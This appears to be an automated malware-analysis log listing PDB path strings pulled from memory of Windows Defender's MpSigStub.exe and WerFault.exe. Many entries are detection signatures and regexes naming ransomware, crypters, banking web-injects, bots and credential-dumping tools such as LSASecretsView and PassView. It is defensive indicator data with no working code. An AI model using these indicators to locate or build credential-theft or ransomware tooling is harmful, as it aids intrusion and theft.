Source: Binary string: \Conduit\RnD\Client\IE\Dev\6.16\6.16.1\Release\hk64tbedrs.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: D:\yo\chaos\Release\chaos.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: nafde.pdb source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp
Source: Binary string: .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: autofmt.pdb source: MpSigStub.exe, 00000024.00000003.6356519621.00000197A36DC000.00000004.00000001.sdmp
Source: Binary string: PoolMonPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: TuneUpUtilitiesApp32.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: sxs.pdbj source: WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: sfc.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \Projects\FlashPlayerPlugin\FlashPlayerPlugin\obj\Release\FlashPlayerPlugin.pdb source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: Uc:\Users\Main\Desktop\PackagingModule\PackagingModule\obj\Release\PackagingModule.pdb] source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp
Source: Binary string: AWInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 00000005.00000003.2855994969.00000000029B0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2919220866.00000000030BB000.00000004.00000001.sdmp
Source: Binary string: HookPasswordReset.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: padcryptUninstaller\obj\Debug\padcryptUninstaller.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: c:\Prepare\Control\Work\box\heard.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source: Binary string: PassView.pdb source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp
Source: Binary string: Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: tdc.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: msoert2.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: Tokenvator.pdb source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp
Source: Binary string: I \\WOO\\HT\\AD_Attacker\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdbx source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: \iSafe\trunk\bin\iSafeSvc2.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: dfsfgjfgdes.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdbx source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: L6\\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: \Akl\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: dsquery.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\ebclient\dmsetup\dmsched2\Release\dmsched2.pdbx source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000005.00000003.2856883159.00000000029A5000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962000837.00000000051D0000.00000004.00000040.sdmp
Source: Binary string: dxva2.pdb3 source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp
Source: Binary string: -\BetterInstaller\Release\BetterInstaller.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: (d:\p\loser\a\a\objfre_wxp_x86\i386\A.pdb source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \\spam\\export_email_outlook\\cpp\\.*\\export..x\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: subst.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \BaseFlash.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: Win32\Release\Sdrsrv.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: Cryptor_noVSSnoPers.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \Release\SSEngine.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: C:\mainProduct(old)\x86_bild_cryptor\shell_gen\Release\data_protect2.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: Archer_Add_Packet\Release\Packet.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdbx source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: \R980\Release\R980.pdb source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp
Source: Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: \Release\mailermodule199.pdb source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp
Source: Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb( source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2927187876.000000000617A000.00000004.00000001.sdmp
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp
Source: Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: KSLD.pdb source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp
Source: Binary string: \wyvernlocker.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: cryptdll.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: reg.pdbd source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: !6zyA6@267=HPS.C|dMqd4-qaN|yjm.pdb source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: pid.pdb3 source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: @.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp
Source: Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: vssadmin.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000005.00000003.2859676804.00000000054EC000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2922725864.0000000006136000.00000004.00000001.sdmp
Source: Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp
Source: Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000024.00000003.6327431635.00000197A37A2000.00000004.00000001.sdmp
Source: Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp
Source: Binary string: lsasrv.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp
Source: Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source: Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \ransom.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp
Source: Binary string: PELoader.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source: Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp
Source: Binary string: JOe|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.2858017646.000000000543F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918507179.00000000030CC000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source: Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: CoreMessaging.pdb v source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000005.00000003.2859705734.00000000054F2000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2920656846.000000000613C000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: sdmf|er.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.2862263906.0000000005519000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: irprops.pdbj source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb] source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: Pb730.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: \Release\kugou.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000005.00000003.2855890772.000000000299F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918220694.00000000030AA000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp
Source: Binary string: .+:\\Projects\\tidynet\\Release\\(selfdestruct|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.2858586114.00000000029CB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: SKRFM.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
